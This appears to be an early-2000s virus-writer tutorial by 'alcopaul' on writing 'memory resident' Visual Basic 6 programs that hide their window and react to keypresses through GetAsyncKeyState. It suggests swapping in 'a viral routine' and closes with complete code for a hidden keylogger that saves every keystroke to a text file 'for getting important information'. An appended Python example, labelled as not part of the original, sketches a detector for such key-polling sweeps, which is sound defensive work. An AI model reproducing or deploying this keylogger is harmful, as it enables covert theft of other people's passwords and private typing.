Your First Basic 'Memory Resident' Code In Visual Basic 6 by alcopaul
Back in the good old days, if you coded a memory resident virus, you were considered to be competent...
Most virus coders in the past realised that making their code memory resident would increase its chance
of survival in the wild ... Almost all the viruses made were memory resident.....
Some programs compiled in Visual Basic 6 can become memory resident as long as you don't put Unload Me
in the code or click the x button in the upper right corner of your form..
Module programs without forms to be loaded can't be memory resident coz they automatically exit..
Most malicious code (viruses/worms) nowadays does its thing in one-ply...
It means that when executed, it initialises, does its thing (the payload) and exits...
It just modifies the registry so that it runs at start up or when some file formats are executed,
or overwrites valid files with its own code and waits to be executed, and then terminates itself, or it just
resides in memory without recognising any event that would trigger it to run again...
my reference: AV sites..
Our task now is to make a functional "memory-resident" code.... Without further ado, let's get it on..
All code can be memory resident..
And once our code has achieved this (which we can easily do in vb6), our next mission is to identify
the events that our code will recognise and that will make it active or perform its routine again..
are you with me? Sorry, I'm fuckin' sleepy but all I want is to help you, budding vb coders,
so I'm still goin' on...
===================================
making our memory resident code
===================================
Start VB6, choose Standard EXE
Now we'll code a memory resident program that will display a message
Private Sub Form_Load()
Msgbox "Hello World!"
End Sub
Voila! ... Here's our first memory resident code .. When run, it will display a message box...
But you can still see the form, waiting to get terminated....
Just click the x in upper right corner if you want it to be terminated...
If you don't wanna see the form, click the form, go to Properties Window and set border style to none,
resize the form to its minimum..
when you rerun the code, it will display the messagebox but you won't see any form..
So the only way to terminate this is by alt-ctrl-del, end task, or findwindow/postmessage...
===================================
the events
===================================
Memory resident code is effective when it is able to recognise events and, upon recognising an event,
does its tasks again ... Simple..
Many events take place in the pc .. File read, file open, internet connect, display text, key press etc..
There are so damn many of them that we'll just consider the one event that fits our knowledge base and is obvious..
And that's key press..
Introducing GetAsyncKeyState API
=============================================================================================================================
*** Private Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState" (ByVal vKey As Long) As Integer ***
description from www.vbapi.com
Platforms
Windows 95: Supported.
Windows 98: Supported.
Windows NT: Requires Windows NT 3.1 or later.
Windows 2000: Supported.
Windows CE: Requires Windows CE 1.0 or later.
Description & Usage
GetAsyncKeyState determines whether a certain key is currently pressed and whether that key has been
pressed since the last call to the function. This function fails if the thread calling it does not
currently have the input focus.
Return Value
If the function fails (if the current thread does not have the input focus), the function returns 0.
If the &H8000 bit of the return value is set, the key has been pressed at least once since the last
time the thread called GetAsyncKeyState. If the &H1 bit of the return value is set, the key is
currently pressed down.
Parameters
vKey
The virtual-key code of the key to check.
The virtual-key codes identify various virtual keys. Virtual keys mainly consist of actual keyboard keys,
but also include "virtual" elements such as the three mouse buttons. The virtual keys also include many
"keys" which usually do not exist at all! A key's virtual-key code does not change when modifier keys
(Ctrl, Alt, Shift, etc.) are held -- e.g., the 1 key has the same virtual-key code whether 1 or ! is pressed.
However, the numbers in the numeric keypad on the keyboard do have two different virtual-key codes:
one for when Num Lock is on, and another for when Num Lock is off. Note that the virtual-key codes
of 0-9 and A-Z equal their ASCII codes.
=============================================================================================================================
This API is commonly used in keyloggers, right trojan mastahs? I was once fascinated with keyloggers
and I didn't know how to get started with programming any..
So I went to Planet Source Code, scanned the samples and I found a code with this API..
Using GetAsyncKeyState is so simple and you can code a working keylogger with just a few lines..
Ok? Code ripping? You may say that but I'm just putting the code into good use...
Now let's code...
Preliminaries:
Add timer to your form..
Click the timer box, then be sure to set the interval...
Make your form invisible by doing the steps: Click the form, go to Properties Window and set border style to none,
Resize the form to its minimum..
===================
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Timer1_Timer() ' Interface with timer... Important
On Error Resume Next ' Error Handling Not Allowed
Dim keystate as Integer, scancodes as Integer
For scancodes = 1 to 254 ' all the possible keys in keyboard
keystate = GetAsyncKeyState(scancodes)
If keystate = -32767 Then
'personalised routine here
End If
Next
End Sub
===================
Our skeleton routine is finished..
Now we'll make it recognise the event that will trigger the execution of the code that we want to be executed
Let's look below.. I must say that the data there is incomplete... I just made it...
=============================================================================================================================
table hex 1.1
=============================================================================================================================
*************** Key Hex
***************
*************** Esc 1B
*************** F1 70
*************** F2 71
*************** F3 72
*************** F4 73
*************** F5 74
*************** F6 75
*************** F7 76
*************** F8 77
*************** F9 78
*************** F10 79
*************** F11 7A
*************** F12 7B
*************** RKey 5D
*************** Lock 90
*************** Insert 2D
*************** Home 24
*************** PgeUp 21
*************** PgeDown 22
*************** End 23
*************** Delete 2E
*************** `~ C0
*************** 1! 31
*************** 2@ 32
*************** 3# 33
*************** 4$ 34
*************** 5% 35
*************** 6^ 36
*************** 7& 37
*************** 8* 38
*************** 9( 39
*************** 0) 30
*************** -_ BD
*************** =+ BB
*************** Bckspce 8
*************** Tab 9
*************** q 51
*************** w 57
*************** e 45
*************** r 52
*************** t 54
*************** y 59
*************** u 55
*************** i 49
*************** o 4F
*************** p 50
*************** [{ DB
*************** ]} DD
*************** \| DC
*************** Cpslock 14
*************** a 41
*************** s 53
*************** d 44
*************** f 46
*************** g 47
*************** h 48
*************** j 4A
*************** k 4B
*************** l 4C
*************** ;: BA
*************** '" DE
*************** Enter D
*************** Shift 10
*************** z 5A
*************** x 58
*************** c 43
*************** v 56
*************** b 42
*************** n 4E
*************** m 4D
*************** ,< BC
*************** .> BE
*************** /? BF
*************** Ctrl 11
*************** WinKey 5B
*************** Space 20
*************** left 25
*************** up 26
*************** right 27
*************** down 28
*************** lclick 1
*************** rclick 2
=============================================================================================================================
We'll select the hex representation of a key so that if that key is pressed, it will trigger
the execution of our routine...
e.g. Enter
We want to execute the routine (e.g. displaying a message box) whenever Enter is pressed..
Now let's add some code to the skeleton...
===================
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Timer1_Timer()
On Error Resume Next
Dim keystate as Integer, scancodes as Integer
For scancodes = 1 to 254
keystate = GetAsyncKeyState(scancodes)
If keystate = -32767 Then
'the routine
If Hex(scancodes) = "D" Then
MsgBox "Hello world!"
End If
'eotheroutine
End If
Next
End Sub
===================
Now we're finished .... Just run this code and every time Enter is pressed, the msgbox will appear....
Fun? Yeah..
So we're finished making our first effective memory resident code..
You can replace the msgbox with a viral routine and you can also add another key event trigger routine to the code...
It's simple as 123
======================================================
Bonus: A keylogger
======================================================
Use the skeleton...
Preliminaries:
Add a textbox to your form..
Click the textbox .. Go to Properties Window .. Be sure to empty the text... Then set the locked option to true..
You can make the textbox invisible by setting the visible option to true...
Make your form invisible by doing the steps: Click the form, go to Properties Window and set border style to none,
Resize the form to its minimum..
Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Long) As Integer
Private Sub Timer1_Timer()
On Error Resume Next
Dim keystate as Integer, scancodes as Integer
For scancodes = 1 to 254
keystate = GetAsyncKeyState(scancodes)
If keystate = -32767 Then
Text1.Text = Text1.Text & "-" & Hex(scancodes)
If Len(Text1.Text) = 3000 Then
Open "c:\keypressed.txt" For Output As #1
Print #1, Text1.Text
Close #1
Text1.Text = ""
End If
End If
Next
End Sub
::: Few words from me: Scancodes is set from 1 to 254 so every possible key will be recorded to Text1.Text
every time it is pressed ... Why should we convert scancodes to Hex? So it will be easy to read...
Converting it to Chr isn't practical coz special keys such as shift, ctrl etc. return unreadable strings
(a square) ... Then if Text1.Text is equal to 3000 bytes, it will be recorded in a txt file..
This text file holds the keys that were pressed ... It is beneficial in getting important information..
Period .. If you wanna analyse the text file, just refer to the table hex 1.1..
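Added example (not part of the original article or the author's code): the timer loop above calls GetAsyncKeyState for every code from 1 to 254 on each tick, and that full-range sweep, repeated at a fixed interval, is what an API-monitoring detection can key on. The Python below runs the check over a constructed trace; the trace line format, the process names, the pids and the three thresholds are assumptions made for this example.

```python
import re
from collections import defaultdict

# Constructed trace format (an assumption, not a real tool's output):
#   <ms> <pid> <image> GetAsyncKeyState(0x<vkey>)
LINE = re.compile(r"^(\d+) (\d+) (\S+) GetAsyncKeyState\(0x([0-9A-Fa-f]+)\)$")
BURST_GAP_MS = 5     # calls closer together than this belong to one timer tick
MIN_DISTINCT = 200   # a 1..254 sweep touches almost every virtual-key code
MIN_SWEEPS = 3       # the sweep has to repeat, as a timer-driven loop would

def find_keyboard_sweepers(lines):
    """Return {pid: (image, sweep_count)} for processes that repeatedly
    poll nearly the whole virtual-key range within a single burst."""
    calls, images = defaultdict(list), {}
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue                      # unrelated or malformed line
        ms, pid, vkey = int(m[1]), int(m[2]), int(m[4], 16)
        calls[pid].append((ms, vkey))
        images[pid] = m[3]
    flagged = {}
    for pid, events in calls.items():
        events.sort()
        sweeps, burst, last_ms = 0, set(), None
        for ms, vkey in events:
            if last_ms is not None and ms - last_ms > BURST_GAP_MS:
                sweeps += len(burst) >= MIN_DISTINCT   # close previous burst
                burst = set()
            burst.add(vkey)
            last_ms = ms
        sweeps += len(burst) >= MIN_DISTINCT           # close the final burst
        if sweeps >= MIN_SWEEPS:
            flagged[pid] = (images[pid], sweeps)
    return flagged

def constructed_trace():
    """Sample data built for this example: pid 1200 sweeps 1..254 on every
    100 ms tick; pid 3400 polls only W, A, S, D the way a game would."""
    lines = []
    for tick in range(4):
        t = tick * 100
        lines += [f"{t} 1200 Project1.exe GetAsyncKeyState(0x{vk:X})" for vk in range(1, 255)]
        lines += [f"{t + 1} 3400 game.exe GetAsyncKeyState(0x{vk:X})" for vk in (0x57, 0x41, 0x53, 0x44)]
    return lines

if __name__ == "__main__":
    print(find_keyboard_sweepers(constructed_trace()))
```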
So that's all for now ... I hope I did help in some way...
until then,
alcopaul
[rRlf]
03/22/2k2
rehashed
music: goldfinger, rancid, bob marley, sex pistols, the clash, sublime